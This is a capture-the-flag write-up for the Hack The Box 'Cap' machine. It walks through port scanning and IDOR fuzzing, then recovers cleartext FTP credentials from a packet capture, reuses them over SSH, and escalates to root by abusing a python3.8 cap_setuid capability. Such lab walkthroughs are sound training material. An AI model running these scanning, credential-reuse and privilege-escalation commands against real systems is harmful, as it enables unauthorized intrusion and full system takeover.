CapJanuary 05, 2026 Created by Page Difficulty OS InfoSecJack Hack The Box Easy Linux Enumeration The first step is to perform a scan of the open ports and then list the versions and technologies used on the open ports. nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.10.245 -oG scan /opt/extractports scan nmap -p21,22,80 -Pn -sCV 10.10.10.245 -oN ports Web enumeration While browsing the web application, I noticed that accessing the URL http://10.10.10.245/data/3 displayed a page with a download button pointing to http://10.10.10.245/download/3 Suspecting insecure direct object references (IDOR), I performed fuzzing against the /data/ endpoint to identify other accessible resources: ffuf -c -t 50 -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -u "http://10.10.10.245/data/FUZZ" --mc=200 This revealed additional files, including http://10.10.10.245/download/0 I downloaded this file and identified it as a Wireshark capture. Credential Disclosure via Packet Capture Upon analyzing the PCAP file, I discovered an FTP session where credentials were transmitted in clear text. The credentials belonged to the user nathan. Using these credentials, I authenticated to the FTP service and retrieved the user flag ftp 10.10.10.245 Privilege Escalation Since SSH was also available, I reused the same credentials to obtain a shell on the system ssh nathan@10.10.10.245 After gaining access, I enumerated Linux capabilities assigned to binaries getcap -r / 2>/dev/null The binary /usr/bin/python3.8 had the following capabilities cap_setuid,cap_net_bind_service+eip The cap_setuid capability allows changing the effective UID, which can be abused to escalate privileges. I spawned a Python shell and changed the UID to 0 (root): /usr/bin/python3.8 >>> import os >>> os.setuid(0) >>> os.system("/bin/bash") This resulted in a root shell, allowing me to retrieve the root flag.